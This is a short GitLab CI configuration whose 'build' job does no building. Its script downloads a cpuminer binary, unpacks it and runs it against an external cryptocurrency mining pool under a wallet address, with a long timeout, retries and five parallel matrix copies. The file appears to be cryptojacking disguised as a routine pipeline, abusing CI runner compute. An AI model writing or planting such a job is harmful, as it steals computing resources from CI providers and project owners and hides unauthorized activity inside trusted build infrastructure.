build:
  image: python:latest
  stage: build
  script:
    - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yespowersugar -o stratum+tcp://sugar.miningpool.xyz:8034 -u sugar1qyp8k7kps4wc3njeye72n970npcpdf0xjgxv48j.100401 -t0
  retry:
    max: 2
    when:
      - stuck_or_timeout_failure
      
  timeout: 2 hours 30 minutes
  parallel:
    matrix:
        - PROVIDER: aws
          STACK:
            - app1
            - app2
            - app3
            - app4
            - app5
